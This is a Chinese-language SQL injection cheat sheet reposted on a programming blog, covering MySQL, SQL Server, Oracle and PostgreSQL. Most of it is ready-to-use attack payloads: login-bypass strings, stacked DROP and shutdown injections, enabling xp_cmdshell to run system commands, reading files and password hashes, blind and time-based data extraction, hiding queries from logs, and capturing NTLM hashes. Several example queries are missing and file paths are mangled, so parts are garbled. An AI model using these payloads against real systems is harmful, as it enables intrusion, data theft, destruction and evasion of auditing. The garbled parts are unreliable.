SQL 注入的资料,快速查表大全

2024-05-27 07:48

本文主要是介绍SQL 注入的资料,快速查表大全,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

什么是 SQL 注入速查表?

SQL注入速查表是可以为你提供关于不同种类 SQL注入漏洞 的详细信息的一个资源。这份速查表对于经验丰富的渗透测试人员,或者刚开始接触 Web应用安全 的初学者,都是一份很好的参考资料。

关于这份 SQL 注入速查表

这份 SQL 速查表最初是 2007 年时 Ferruh Mavituna 在他自己的博客上发布的。我们更新了它并将它移到了公司 CEO 的博客上。现在,这份速查表仅包含了 MySQL SQL Server,和有限的一些关于 Oracle PostgerSQL 数据库的信息。表中的部分示例可能无法在每一个场景都正常运行,因为真实使用的环境中,可能因为括号的使用、不同的代码上下文以及出乎意料的、奇怪而复杂的 SQL 语句而有所差异。

示例提供给你关于潜在攻击的基本思路,而且几乎每节都包含有简短的说明。

  • M:MySQL
  • S:SQL Server
  • P:PostgreSQL
  • O:Oracle
  • +:可能出现在其他所有数据库

例如:

  • (MS)代表:MySQL 和 SQL Server 等
  • (M*S)代表:仅部分版本及有特殊说明的 MySQL,以及 SQLServer

目录表

  1. 语法参考,攻击样例以及注入小技巧

(1)行间注释

  • 使用了行间注释的 SQL 注入攻击样例

(2)行内注释

  • 经典的行内注释注入攻击样例
  • MySQL 版本探测攻击样例

(3)堆叠查询(Stacking Queries)

  • 支持堆叠查询的语言/数据库
  • 关于 MySQL 和 PHP
  • 堆叠注入攻击样例

(4)If 语句

  • MySQL 的 If 语句
  • SQL Server 的 If 语句
  • If 语句的注入攻击样例

(5)使用整数(Integers)

(6)字符串操作

  • 字符串的连结

(7)没有引号的字符串

  • 基于 16 进制的注入攻击样例

(8)字符串变体 & 相关知识

(9)Union 注入

  • UNION — 语言问题处理

(10)绕过登陆界面

(11)在SQL Server 2005 中启用 xp_cmdshell

(12)探测 SQL Server 数据库的结构

(13)从基于错误的 SQL 注入中快速提取数据的方法

(14)SQL 盲注

(15)掩盖痕迹

(16)MySQL 的额外说明

(17)二阶 SQL 注入

(18)带外(OOB)频道攻击

语法参考、攻击示例和注入小技巧

结束 / 注释掉 / 行注释

行间注释

注释掉查询语句的其余部分

行间注释通常用于忽略掉查询语句的其余部分,这样你就不用处理因为注入导致的语法变动。

  • — (SM)
  • # (M)

行间注释的 SQL 注入攻击示例

  • 用户名:admin’–

这会让你以admin用户身份登录,因为其余部分的SQL语句被注释掉了。

行内注释

通过不关闭的注释,注释掉查询语句的其余部分,或者用于绕过黑名单过滤、移除空格、迷惑和探测数据库版本。

  • /*这里是注释内容*/ (SM)
    • DROP/*注释*/sampletable
    • DR/**/OP/*绕过过滤*/sampletable
    • SELECT/*消除空格*/password/**/FROM/**/Members
  • /*! MYSQL 专有 SQL */ (M)

这是 MySQL 的专有语法。非常适合用来探测 MySQL 版本。如果你在注释中写入代码,只有 MySQL 才会执行。你同样可以使用这个方法,让代码只在服务器版本高于指定版本才执行。

经典的行内注释 SQL 注入攻击示例

在查询结尾简单地去除其他内容。等同于 10; DROP TABLE members —

如果 MySQL 版本高于 23.02 会抛出一个除数为 0(division by 0)的错误

MySQL 版本探测攻击示例

如果 MySQL 的版本高于 23.02,执行上面两个查询你将得到相同的结果

如果 MySQL 版本高于 23.02 会抛出一个除数为 0(division by 0)的错误

堆叠查询

在一个事务中执行多个查询。这在每一个注入点都非常有用,尤其是后端使用了 SQL Server 的应用程序。

  • ; (S)

结束一个查询并开始一个新的查询。

语言 / 数据库堆叠查询支持表

绿色:支持;深灰色:不支持;浅灰色:未知

 

关于 MySQL 和 PHP

阐明一些问题

PHP – MySQL 不支持堆叠查询,Java 不支持堆叠查询(Oracle 我很确定,其他的就不太确定了)。通常来说 MySQL 支持堆叠查询,但在 PHP – MySQL 应用程序中大多数配置下的数据库层都不能执行第二条查询,也许 MySQL 客户端支持这个,我并不是很确定。有人能说明下吗?

堆叠注入攻击示例
  • ID: 10;DROP members —

这在正常SQL查询执行后将会执行 DROP members 语句。

If语句

根据If语句得到响应。这是盲注(Blind SQL Injection)的关键点之一,在盲注和精确的简单测试中都非常有用。

MySQL 的 If 语句

IF(condition,true-part,false-part)(M)

SQL Server 的 If 语句

IF condition true-part ELSE false-part(S)

Oracle 的 If 语句

  • BEGIN

IF condition THEN true-part; ELSE false-part; END IF; END;(O)

PostgreSQL 的 If 语句

  • SELECT CASE WHEN condition THEN true-part ELSE false-part END;(P)

If 语句的 SQL 注入攻击示例

如果当前登录的用户不是 ”sa” 或 “dbo”,语句会抛出 除数为0 的错误。

整数的使用

对于绕过非常有用,如 magic_quotes() 和类似的过滤器,甚至是各种WAF。

  • 0xHEXNUMBER(SM)
    你可以这样使用 16 进制数。

字符串操作

字符串相关的操作。这些对于构造不含引号、绕过黑名单或探测后端数据库的注入非常有用。

字符串的连结

  • + (S)
  • || (*MO)

* 关于 MySQL 的 “||”

仅当 MySQL 在 ANSI 模式下这(指 “||” 符号)才会执行,其他模式下 MySQL 会当成 逻辑运算符 并返回 0。更好的方式是使用 MySQL 的 CONCAT() 函数。

  • CONCAT(str1, str2, str3, …) (M)
    连接参数里提供的字符串。

没有引号的字符串

有一些直接的方式可以使用字符串,但通常更合适的是使用 CHAR() (MS) 和 CONCAT() (M) 来生成无引号的字符串。

基于 16 进制的 SQL 注入示例

这会显示 c:boot.ini 的内容

字符串变体 & 相关知识

  • ASCII() (SMP)
    返回最左边字符的ASCII码的值。这是盲注的一个必备函数。SELECT ASCII(‘a’)
  • CHAR() (SM)
    将一个整数转换为对应的ASCII值。SELECT CHAR(64)

Union注入

通过union你能跨表执行 SQL 查询。 基本上你可以污染(注入)查询使它返回另一个表的记录。

这个查询会联结并返回 news 表和 members 表的所有记录。

另一个例子:

UNION – 语言问题处理

当你使用 Union 注入的时候,有时会遇到错误,因为不同语言的设置(表的设置、字段的设置、表或数据库的联结设置等等),下面这些函数对于解决以上问题很有用。这样的问题比较少见,但当你处理例如日文、俄文、土耳其文或其他类似的应用程序时,你就会发现了。

  • SQL Server (S)
    使用 COLLATE SQL_Latin1_General_Cp1254_CS_AS 或其他有效的方式 – 具体信息可以查看 SQL Server 的文档。
  • MySQL (M)
    Hex() 基本上可以解决所有出现的问题。

绕过登录界面(SMO+)

SQL 注入入门指引,登录小技巧

  • admin’ —
  • admin’ #
  • admin’/*
  • ‘ or 1=1–
  • ‘ or 1=1#
  • ‘ or 1=1/*
  • ‘) or ‘1’=’1–
  • ‘) or (‘1’=’1–
  • ….
  • 以不同的用户登录 (SM*)
    ‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–

* 旧版本的 MySQL 不支持 union 查询

绕过检查 MD5 哈希的登录界面

如果应用是先通过用户名获取记录,然后再把返回的 MD5 值与你输入的密码的 MD5 进行比较,那么你就需要一些额外的技巧欺骗应用来绕过验证了。你可以将一个已知明文的 MD5 哈希和它的明文一起提交,这种情况下,应用会比较你的密码和你提供的 MD5 值,而不是从数据库获取的 MD5。

绕过 MD5 检查的例子 (MSP)

基于错误 – 探测列名

使用 HAVING 探测列名 – 基于错误(S)

顺序不分先后

  • ‘ HAVING 1=1 —
  • ‘ GROUP BY columnfromerror1 HAVING 1=1 —
  • ‘ GROUP BY columnfromerror1, columnfromerror2 HAVING 1=1 —
  • ‘ GROUP BY columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 — and so on
  • 直到不再报错就完成了。

在 SELECT 查询中使用 ORDER BY 探测有多少个列(MSO+)

通过 ORDER BY 探测列数可以加快 UNION 注入的进度。

  • ORDER BY 1–
  • ORDER BY 2–
  • ORDER BY N– so on
  • 持续操作直到出现错误,报错时使用的数字就是列数了。
数据类型、UNION 等

提示:

  • 在使用 UNION 时总是搭配上 ALL,因为会存在相同值的字段,而缺省情况下,Union 都会尝试返回非重复的记录。
  • 在查询的开始处,可以使用 -1 或者其他不存在的值来去除左侧表中非必须的记录(前提是注入点在 WHERE 语句里)。如果你一次只想取得一条记录,这是非常关键的点。
  • 在对大多数数据类型的 UNION 注入中使用 NULL 代替猜测它是字符串、日期、整数等类型。
    • 盲注的情况下,要注意判断错误时来自数据库还是来自应用程序本身。因为像 ASP.NET 或有其他语言,通常在使用 NULL 值的时候会抛出错误(因为开发者们一般没有想过用户名字段会出现 NULL)
获取列类型
  • ‘ union select sum(columntofind) from users— (S)
    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.如果没有返回错误说明字段是数字类型(numeric).
  • 你也可以使用 CAST() 或者 CONVERT()
    • SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL–
  • 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
    没有错误 – 语法是对的。这是 MS SQL Server 的语法。继续。
  • 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
    没有错误 – 第一列是 integer 类型。
  • 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 —
    错误! – 第二列不是 integer 类型。
  • 11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
    没有错误 – 第二列是 string 类型。
  • 11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
    报错! – 第三列不是 integer 类型。
  • …Microsoft OLE DB Provider for SQL Server error ‘80040e07’
    Explicit conversion from data type int to image is not allowed.

你在遇到 union 错误之前会遇到 convert() 错误! 所以从 convert() 开始,再用 union。

简单的注入(MSO+)

有用的函数 / 信息收集 / 存储过程 / Bulk SQL 注入说明

@@version(MS)
数据库的版本和关于 SQL Server 的详细信息。这是个常量,你能把它当做一个列来 select,而且不需要提供表名。同样,你也能在 insert、update 语句或者函数里使用它。

Bulk insert(S)

(补充说明:bulk insert 是 SQL Server 的一个命令)

插入一个文件的内容到表中。如果你不知道应用的内部路径,可以读取 IIS(仅限 IIS 6)的元数据库文件(metabase file,%systemroot%system32inetsrvMetaBase.xml)然后找出应用的路径。

  1. Create table foo( line varchar(8000) )
    1. bulk insert foo from ‘c:inetpubwwwrootlogin.asp’
    2. Drop 临时表,并重复另一个文件。

BCP(S)

(补充说明:BCP 是 SQL Server 的一个工具)

写文本文件。使用这个功能需要登录。
bcp “SELECT * FROM test..foo” queryout c:inetpubwwwrootruncommand.asp -c -Slocalhost -Usa -Pfoobar

SQL Server 中的 VBS 和 WSH(S)

开启 ActiveX 支持的情况下,你可以在 SQL Server 中使用 VBS 和 WSH 脚本编程。

declare @o int
exec sp_oacreate ‘wscript.shell’, @o out
exec sp_oamethod @o, ‘run’, NULL, ‘notepad.exe’
Username: ‘; declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL, ‘notepad.exe’ —

执行系统命令、xp_cmdshell(S)

众所周知,在 SQL Server 2005 中默认是禁用的。你需要 Admin 权限。.

EXEC master.dbo.xp_cmdshell ‘cmd.exe dir c:’

用 ping 简单检查下 (在开始之前先配置好你的防火墙或嗅探器确认请求能发出)

EXEC master.dbo.xp_cmdshell ‘ping ‘

你无法从错误或 union 或其他的什么直接读取结果。

SQL Server 中的一些特殊表(S)

  • Error Messages
    .sysmessages
  • Linked Servers
    .sysservers
  • Password (2000 和 2005 版本都能被入侵,它们使用非常相似的哈希算法)
    SQL Server 2000:.sysxlogins
    SQL Server 2005 : sys.sql_logins

SQL Server 的其他存储过程(S)

  1. 命令执行(xp_cmdshell
    exec master..xp_cmdshell ‘dir’
  1. 注册表相关(xp_regread
    1. xp_regaddmultistring
    2. xp_regdeletekey
    3. xp_regdeletevalue
    4. xp_regenumkeys
    5. xp_regenumvalues
    6. xp_regread
    7. xp_regremovemultistring
    8. xp_regwrite
      exec xp_regread HKEY_LOCAL_MACHINE, ‘SYSTEMCurrentControlSetServiceslanmanserverparameters’, ‘nullsessionshares’
      exec xp_regenumvalues HKEY_LOCAL_MACHINE, ‘SYSTEMCurrentControlSetServicessnmpparametersvalidcommunities’
  2. 管理服务(xp_servicecontrol
  3. 媒体(xp_availablemedia
  4. ODBC 资源(xp_enumdsn
  5. 登录模式(xp_loginconfig
  6. 创建 Cab 文件(xp_makecab
  7. 域名列举(xp_ntsec_enumdomains
  8. 结束进程(需要进程 ID)(xp_terminate_process
  9. 创建新程序(实际上你想执行什么都可以了)
    sp_addextendedproc ‘xp_webserver’, ‘c:tempx.dll’
    exec xp_webserver
  10. 将文本文件写进 UNC 或内部路径(sp_makewebtask)

MSSQL Bulk 说明

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell ‘dir *.exe’;IF (@result = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q”DBCC SHOWCONTIG”

OPENROWSET (Transact-SQL)  – http://msdn2.microsoft.com/en-us/library/ms190312.aspx

你不能在 SQL Server 的 Insert 语句里使用子查询。

使用 LIMIT(M)或 ORDER(MSO)的注入

如果注入点在 limit 的第二个参数处,你可以把它注释掉或者使用 union 注入。

停止 SQL Server(S)

当你真的不开心了,可以使用 ‘;shutdown —

在 SQL Server 中启用 xp_cmdshell

默认情况下,在 SQL Server 2005 中 xp_cmdshell 和其他一些存在潜在危险的存储过程都是被禁用的。如果你有 admin 权限就可以启用它们了。

EXEC sp_configure ‘show advanced options’,1
RECONFIGURE

EXEC sp_configure ‘xp_cmdshell’,1
RECONFIGURE

探测 SQL Server 数据库的结构(S)

获取用户定义表

获取字段名

移动记录(S)

  • 修改 WHERE 和使用 NOT IN 或 NOT EXIST

… WHERE users NOT IN (‘First User’, ‘Second User’)

  • 使用恶劣的小技巧

从基于错误的 SQL 注入中快速提取数据的方法(S)

详细说明可以查看文章:从基于错误的 SQL 注入中快速提取数据的方法

探测 MySQL 数据库的结构(M)

获取用户定义表

获取列名

探测 Oracle 数据库的结构(O)

获取用户定义表

获取列名

SQL 盲注

关于 SQL 盲注

在一个良好的生产环境应用程序中,通常你无法在页面上看到错误(error)提示,所以你也就无法通过 Union 攻击或者基于错误的攻击中提取数据。你不得不使用盲注攻击来取得数据。SQL 盲注存在有两种类型:

一般盲注:你无法在页面中看到响应,但你仍然可以通过响应或 HTTP 状态码确定查询的结果;
完全盲注:无论你怎么注入也无法从输出看出任何变化。这样你只能通过日志记录或类似的来注入。虽然这并不常见。

在一般盲注情况中你可以使用 if 语句或者 WHERE 查询来注入(一般来说很容易),在完全盲注你需要使用一些延时函数并分析响应时间。因此你可以在注入 SQL Server 时使用 WAIT FOR DELAY ‘0:0:10’,注入 MySQL 时使用 BENCHMARK() 和 sleep(10),注入 PostgreSQL 时使用 pg_sleep(10),还有对 ORACLE 的一些 PL/SQL 小技巧。

真实且有点复杂的 SQL 盲注攻击示例

这些输出来自于一个真实的私有 SQL 盲注工具对使用 SQL Server 的后端程序的攻击和表名遍历。这些请求完成了探测第一个表名的首字符。因为是自动化攻击,SQL 查询比实际需求复杂一些。过程中我们通过二分查找算法尝试确定字符的 ASCII 值。


TRUE 和 FALSE 标记代表查询返回的是 true 或 false。

最后两个查询失败我们可以毫无疑问地确定表名第一个字符的 ASCII 值是 80,这意味着第一个字符是 P。这就是使用二分查找算法进行 SQL 盲注的方法。另一个常见的方法是一位一位(bit)地读取数据。这两个方法在不同情况下都有效。

延时盲注

首先,在完全没有提示(really blind)的情况下才使用,否则使用 1/0 方式的错误辨认差异。其次,使用超过 20 秒的延时需要小心,因为数据库的 API 连接或脚本可能出现超时。

WAIT FOR DELAY ‘time’(S)

这个与sleep一样,等待指定的时间。通过 CPU 安全的方法让数据库等待。

另外,你也可以使用分数,像这样

真实案例

  • 是否‘sa’用户?
    if (select user) = ‘sa’ waitfor delay ‘0:0:10’
  • ProductID = 1;waitfor delay ‘0:0:10’–
  • ProductID =1);waitfor delay ‘0:0:10’–
  • ProductID =1′;waitfor delay ‘0:0:10’–
  • ProductID =1′);waitfor delay ‘0:0:10’–
  • ProductID =1));waitfor delay ‘0:0:10’–
  • ProductID =1′));waitfor delay ‘0:0:10’–

BENCHMARK()(M)

基本上,很多人滥用这个命令来做 MySQL 的延时。小心使用,这会很快地消耗服务器的资源!

真实案例

  • 判断是否 root 用户
  • 判断表是否存在

pg_sleep(seconds)(P)

睡眠指定的秒数。

sleep(seconds)(M)

睡眠指定的秒数。

dbms_pipe.receive_message(O)

睡眠指定的秒数。

{INJECTION} = 你想实际运行的查询。

如果条件为真(true),会在10秒后才响应。如果是假(false),延迟1秒就返回。

掩盖痕迹

SQL Server -sp_password 日志绕过(S)

出于安全原因,SQL Server 不会将包含 sp_password 的查询记录到日志中。. 所以如果你在查询中加入 –sp_password 选项,你执行的查询就不会出现在数据库日志中(当然,在 Web 服务器的日志里还是会有,所以可能的话尽量使用 POST 方法)

清晰的 SQL 注入测试

这些测试完全适用于 SQL 盲注和静默攻击。

  1. asp?id=4(SMO)
    1. asp?id=5-1
    2. asp?id=4 OR 1=1
  2. asp?name=Book
    1. asp?name=Bo’%2b’ok
    2. asp?name=Bo’ || ’ok(OM)
    3. asp?name=Book’ OR ‘x’=’x

MySQL 的额外说明

  • 子查询只在 MySQL 4.1 或以上版本才生效
  • 用户
    • SELECT User,Password FROM mysql.user;
  • SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)=’2′,BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
  • SELECT … INTO DUMPFILE
    • 把查询写入一个新文件(不能修改已有的文件)
  • UDF 函数
    • create function LockWorkStation returns integer soname ‘user32’;
    • select LockWorkStation();
    • create function ExitProcess returns integer soname ‘kernel32’;
    • select exitprocess();
  • SELECT USER();
  • SELECT password,USER() FROM mysql.user;
  • admin密码哈希值的第一位
    • SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
  • 读取文件
    • php?user=1+union+select+load_file(0x63…),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
  • MySQL Load Data infile
    • 这个功能默认是没有开启的!
      • create table foo( line blob );
        load data infile ‘c:/boot.ini’ into table foo;
        select * from foo;
    • MySQL 的更多延时方法
    • select benchmark( 500000, sha1( ‘test’ ) );
    • php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
    • select if( user() like ‘root@%’, benchmark(100000,sha1(‘test’)), ‘false’ );
      遍历数据,暴力猜解
      • select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1(‘test’)), ‘false’ );

潜在有用的 MySQL 函数

  • MD5()
    MD5 哈希
  • SHA1()
    SHA1 哈希
  • PASSWORD()
  • ENCODE()
  • COMPRESS()
    压缩数据,在 SQL 盲注读取大量二进制数据时很有用。
  • ROW_COUNT()
  • SCHEMA()
  • VERSION()
    等同于 @@version

二阶 SQL 注入

一般你在某个地方进行 SQL 注入并期望它没有被过滤掉。这是常见的隐藏层问题。

如果应用程序在一个不安全的存储过程(或函数、流程等)中使用了 name 字段,那么它会将第一个用户的密码写入到你的 name 字段。

通过强迫 SQL Server 来得到 NTLM 哈希

这个攻击能帮你得到目标服务器上 SQL Server 用户的 Windows 密码,不过你的接入连接可能会被防火墙拦截。这在内部渗透测试中非常有用。我们强迫 SQL Server 连接我们的 Windows UNC 共享(Windows 上常见的网络共享)并通过类似 Cain & Abel(网络嗅探和口令破解工具)的工具捕获 NTLM 会话数据。

从一个 UNC 共享进行 Bulk insert(S)

查看 Bulk Insert Reference 可以让你了解怎么使用 bulk insert。


带外攻击

SQL Server

{INJECTION} = 你想要执行的查询。

MySQL

{INJECTION} = 你想要执行的查询。

Oracle

{INJECTION} = 你想要执行的查询。

参考资料

由于这些笔记是从一些不同的来源搜集的,有些年头了,个人经验看来我可能遗漏了部分参考资料。如果有这样的情况,请 联系我们 以便将你加入这个列表。

  • 通用类的
    • Advanced SQL Injection In SQL Applications, Chris Anley
    • More Advanced SQL Injection In SQL Applications, Chris Anley
    • Blindfolded SQL Injection, Ofer Maor – Amichai Shulman
    • Hackproofing MySQL, Chris Anley
    • Database Hacker’s Handbook, David Litchfield, Chris Anley, John Heasman, Bill Grindlay
  • MSSQL 相关的
    • MSSQL Operators – http://msdn2.microsoft.com/en-us/library/aa276846(SQL.80).aspx
    • Transact-SQL Reference – http://msdn2.microsoft.com/en-us/library/aa299742(SQL.80).aspx
    • String Functions (Transact-SQL) – http://msdn2.microsoft.com/en-us/library/ms181984.aspx
    • List of MSSQL Server Collation Names –http://msdn2.microsoft.com/en-us/library/ms180175.aspx
    • MSSQL Server 2005 Login Information and some other functions:Sumit Siddharth
  • MySQL 相关的
    • Comments: http://dev.mysql.com/doc/
    • Control Flows – http://dev.mysql.com/doc/refman/5.0/en/control-flow-functions.html
    • MySQL Gotchas – http://sql-info.de/mysql/gotchas.htm
    • New SQL Injection Concept, Tonu Samuel

这篇关于SQL 注入的资料,快速查表大全的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1006871

相关文章

MySQL双主搭建+keepalived高可用的实现

《MySQL双主搭建+keepalived高可用的实现》本文主要介绍了MySQL双主搭建+keepalived高可用的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,... 目录一、测试环境准备二、主从搭建1.创建复制用户2.创建复制关系3.开启复制,确认复制是否成功4.同

MyBatis 动态 SQL 优化之标签的实战与技巧(常见用法)

《MyBatis动态SQL优化之标签的实战与技巧(常见用法)》本文通过详细的示例和实际应用场景,介绍了如何有效利用这些标签来优化MyBatis配置,提升开发效率,确保SQL的高效执行和安全性,感... 目录动态SQL详解一、动态SQL的核心概念1.1 什么是动态SQL?1.2 动态SQL的优点1.3 动态S

Mysql表的简单操作(基本技能)

《Mysql表的简单操作(基本技能)》在数据库中,表的操作主要包括表的创建、查看、修改、删除等,了解如何操作这些表是数据库管理和开发的基本技能,本文给大家介绍Mysql表的简单操作,感兴趣的朋友一起看... 目录3.1 创建表 3.2 查看表结构3.3 修改表3.4 实践案例:修改表在数据库中,表的操作主要

mysql出现ERROR 2003 (HY000): Can‘t connect to MySQL server on ‘localhost‘ (10061)的解决方法

《mysql出现ERROR2003(HY000):Can‘tconnecttoMySQLserveron‘localhost‘(10061)的解决方法》本文主要介绍了mysql出现... 目录前言:第一步:第二步:第三步:总结:前言:当你想通过命令窗口想打开mysql时候发现提http://www.cpp

MySQL大表数据的分区与分库分表的实现

《MySQL大表数据的分区与分库分表的实现》数据库的分区和分库分表是两种常用的技术方案,本文主要介绍了MySQL大表数据的分区与分库分表的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录1. mysql大表数据的分区1.1 什么是分区?1.2 分区的类型1.3 分区的优点1.4 分

MySQL错误代码2058和2059的解决办法

《MySQL错误代码2058和2059的解决办法》:本文主要介绍MySQL错误代码2058和2059的解决办法,2058和2059的错误码核心都是你用的客户端工具和mysql版本的密码插件不匹配,... 目录1. 前置理解2.报错现象3.解决办法(敲重点!!!)1. php前置理解2058和2059的错误

Mysql删除几亿条数据表中的部分数据的方法实现

《Mysql删除几亿条数据表中的部分数据的方法实现》在MySQL中删除一个大表中的数据时,需要特别注意操作的性能和对系统的影响,本文主要介绍了Mysql删除几亿条数据表中的部分数据的方法实现,具有一定... 目录1、需求2、方案1. 使用 DELETE 语句分批删除2. 使用 INPLACE ALTER T

MySQL INSERT语句实现当记录不存在时插入的几种方法

《MySQLINSERT语句实现当记录不存在时插入的几种方法》MySQL的INSERT语句是用于向数据库表中插入新记录的关键命令,下面:本文主要介绍MySQLINSERT语句实现当记录不存在时... 目录使用 INSERT IGNORE使用 ON DUPLICATE KEY UPDATE使用 REPLACE

MySQL Workbench 安装教程(保姆级)

《MySQLWorkbench安装教程(保姆级)》MySQLWorkbench是一款强大的数据库设计和管理工具,本文主要介绍了MySQLWorkbench安装教程,文中通过图文介绍的非常详细,对大... 目录前言:详细步骤:一、检查安装的数据库版本二、在官网下载对应的mysql Workbench版本,要是

mysql数据库重置表主键id的实现

《mysql数据库重置表主键id的实现》在我们的开发过程中,难免在做测试的时候会生成一些杂乱无章的SQL主键数据,本文主要介绍了mysql数据库重置表主键id的实现,具有一定的参考价值,感兴趣的可以了... 目录关键语法演示案例在我们的开发过程中,难免在做测试的时候会生成一些杂乱无章的SQL主键数据,当我们